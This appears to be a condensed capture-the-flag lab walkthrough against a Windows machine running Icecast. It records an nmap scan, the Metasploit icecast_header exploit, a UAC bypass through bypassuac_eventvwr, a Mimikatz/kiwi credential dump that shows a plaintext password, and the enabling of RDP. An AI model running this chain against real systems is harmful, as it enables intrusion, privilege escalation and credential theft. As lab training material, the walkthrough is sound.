# ── Nmap ─────────────────────────────────────
└─# nmap -sS -sC -p- 10.10.X.X -T4
8000/tcp open http Icecast streaming media server
# ── Exploit ──────────────────────────────────
msf6 > use exploit/windows/http/icecast_header
msf6 exploit> set RHOSTS 10.10.X.X
msf6 exploit> run
[*] Meterpreter session 1 opened
meterpreter > getuid
Server username: DARK-PC\Dark
# ── PrivEsc ──────────────────────────────────
meterpreter > run post/multi/recon/local_exploit_suggester
exploit/windows/local/bypassuac_eventvwr (probable)
msf6 > use exploit/windows/local/bypassuac_eventvwr
msf6 exploit> set SESSION 1 → run
[*] Meterpreter session 2 opened (elevated)
# ── Kiwi / Mimikatz ──────────────────────────
meterpreter > migrate -N spoolsv.exe
meterpreter > load kiwi
meterpreter > creds_all
Username: Dark | Password: Password1!
meterpreter > run post/windows/manage/enable_rdp
RDP enabled successfully
└─#